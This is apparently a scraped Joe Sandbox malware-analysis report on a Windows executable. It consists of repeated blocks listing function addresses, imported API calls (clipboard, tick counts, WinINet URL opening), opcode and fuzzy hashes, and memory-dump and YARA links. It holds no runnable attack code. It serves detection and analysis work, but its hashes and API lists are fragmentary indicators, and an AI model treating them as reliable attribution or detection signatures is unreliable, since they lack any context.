Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalLabelMessagePeekUnlockVolumewcsncpy
String ID:
API String ID: 2345973108-0
Opcode ID: 35c3db7763a7536dab53ab74aae8e6b4b2fad2429aa22e8e2c296034dfcfae7f
Instruction ID: 95baae4879db8c814c9d477584ae9aa1afab0319b73cc5f2b62fd47fcb167512
Opcode Fuzzy Hash: 35c3db7763a7536dab53ab74aae8e6b4b2fad2429aa22e8e2c296034dfcfae7f
Instruction Fuzzy Hash: B3816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037705 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fb524971182c1dbea17464b909c37f859fa1972cee5684d37c7009d3d2a3ca0b
Instruction ID: 4c28536b201e24183907c39e974c69fb1e56e6690e32063ef363c9898c17d95f
Opcode Fuzzy Hash: fb524971182c1dbea17464b909c37f859fa1972cee5684d37c7009d3d2a3ca0b
Instruction Fuzzy Hash: F2816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037A63 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140063AA0: SetCurrentDirectoryW.KERNEL32 ref: 0000000140063AE3

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseCurrentDirectoryGlobalMessagePeekUnlock
String ID:
API String ID: 1560712716-0
Opcode ID: 4aa4cd62bfac42d1a1f67a3fe214f7ca6fb8632738361a7a56fe740b8f7394f1
Instruction ID: d3d0cf119635325550aa4241e66643dadf1317f9e354750746eec3e7888ff88a
Opcode Fuzzy Hash: 4aa4cd62bfac42d1a1f67a3fe214f7ca6fb8632738361a7a56fe740b8f7394f1
Instruction Fuzzy Hash: 36816132205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037AB4 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9d5f9f9344bef971890206682e69865a7d7303809403ca8888c23e8b1e8a40f2
Instruction ID: 102e97ca0c5d9b4b66d2a11296ca9c543387f801879e5645785ddd1d183156b4
Opcode Fuzzy Hash: 9d5f9f9344bef971890206682e69865a7d7303809403ca8888c23e8b1e8a40f2
Instruction Fuzzy Hash: 2A816F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038196 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 8d2d6b9fafde3f62ae0fabd2d66e0574935de20bf33fe268cb5840578f4e7153
Instruction ID: 5030e6f434a49efefc00005d16b931806ab9c945a75225f9e57cc1f70a92bf87
Opcode Fuzzy Hash: 8d2d6b9fafde3f62ae0fabd2d66e0574935de20bf33fe268cb5840578f4e7153
Instruction Fuzzy Hash: 31816032605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036397 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014007E490: _wcstoi64.LIBCMT ref: 000000014007E4F4
Part of subcall function 000000014007E490: InternetOpenW.WININET ref: 000000014007E569
Part of subcall function 000000014007E490: InternetOpenUrlW.WININET ref: 000000014007E58C
Part of subcall function 000000014007E490: InternetCloseHandle.WININET ref: 000000014007E59D

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountInternetTick$CloseOpen$ClipboardGlobalHandleMessagePeekUnlock_wcstoi64
String ID:
API String ID: 2751744677-0
Opcode ID: e9d4db7c2a4d82e4e30bad905e583d807efea66ab71ba6df386783e6308f6bbc
Instruction ID: 2aa486ea33f44688c604cd3b2f2bc5ea79e0d1574d5518cc94ab16863299de38
Opcode Fuzzy Hash: e9d4db7c2a4d82e4e30bad905e583d807efea66ab71ba6df386783e6308f6bbc
Instruction Fuzzy Hash: 98816032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003851A Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7c3f328a99d0f9b4a24c20f9fa0b9a82898a896a207ea1c00c779032fd978f7c
Instruction ID: f383ee547f54974ed90ac125bc180d1b3ef58ba99e45c86da4e3c73056d56fb1
Opcode Fuzzy Hash: 7c3f328a99d0f9b4a24c20f9fa0b9a82898a896a207ea1c00c779032fd978f7c
Instruction Fuzzy Hash: 52816032605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003856B Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2fd33df8a997f30702df17981f7dcf720e067f730383cbf19267416cf604b6bf
Instruction ID: 7129c1f4555cc177860dbafd43241bfd4a587454c8da467a10e2ac092c0e6632
Opcode Fuzzy Hash: 2fd33df8a997f30702df17981f7dcf720e067f730383cbf19267416cf604b6bf
Instruction Fuzzy Hash: D8816132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038596 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 8075040a305b9c71f314a31140b9ec66ed8ada29f897aee9f2ef4985f6a070d1
Instruction ID: b08b8e195a582a3ff087204705ad1813754dd0c0e348916cb183a17aa2bbfd39
Opcode Fuzzy Hash: 8075040a305b9c71f314a31140b9ec66ed8ada29f897aee9f2ef4985f6a070d1
Instruction Fuzzy Hash: 1F816132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038663 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a2de8008e752f5c80fb3df8286f67117f526f074e246764a63b7d779d5d728a7
Instruction ID: 54fb18bf26b39885421204dba24ceb4986bb424dac2f4a11a96728c8481362ed
Opcode Fuzzy Hash: a2de8008e752f5c80fb3df8286f67117f526f074e246764a63b7d779d5d728a7
Instruction Fuzzy Hash: 62816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003867D Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 84cb70e6e86b9754b1301ddfd44c1847e7b0b0c85e13957baf80daf0ca764aa9
Instruction ID: 29c830a46f29f2777e35446dada89f0b8b57c43f91d414ab01ed8694eeef92b1
Opcode Fuzzy Hash: 84cb70e6e86b9754b1301ddfd44c1847e7b0b0c85e13957baf80daf0ca764aa9
Instruction Fuzzy Hash: E2817032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038697 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f20a3e796b116e6c426edeb68987f92bad814daee9941f24fdc34d575a7fe8b9
Instruction ID: a3c56084c60be7e11c0a74e6b293fa20270d1c656f6b1d5c40e48e309bbabdc2
Opcode Fuzzy Hash: f20a3e796b116e6c426edeb68987f92bad814daee9941f24fdc34d575a7fe8b9
Instruction Fuzzy Hash: 9E816032205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036C33 Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004DA20: SendMessageTimeoutW.USER32 ref: 000000014004DBCC

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: a6b751bacad486a0994e6a59dfb99e17fab394ef109b7a01831a033d68a10d29
Instruction ID: 68294c8fc13dca0e25737d313e304220828d126790a50964a33af6f1561235e0
Opcode Fuzzy Hash: a6b751bacad486a0994e6a59dfb99e17fab394ef109b7a01831a033d68a10d29
Instruction Fuzzy Hash: F7816132205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036E0C Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 1ecc3b9e01b3335873ef607174c19ddb3ecac8dc0b27d9ef5282546bfaf382df
Instruction ID: 592f74c9afebc9d09c6a7a9fe43c73895dc09e3de3442f605ea514b194ccda5a
Opcode Fuzzy Hash: 1ecc3b9e01b3335873ef607174c19ddb3ecac8dc0b27d9ef5282546bfaf382df
Instruction Fuzzy Hash: 1F816F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400374BE Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005F040: wcsncpy.LIBCMT ref: 000000014005F084
Part of subcall function 000000014005F040: GetDiskFreeSpaceExW.KERNEL32 ref: 000000014005F0E5

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
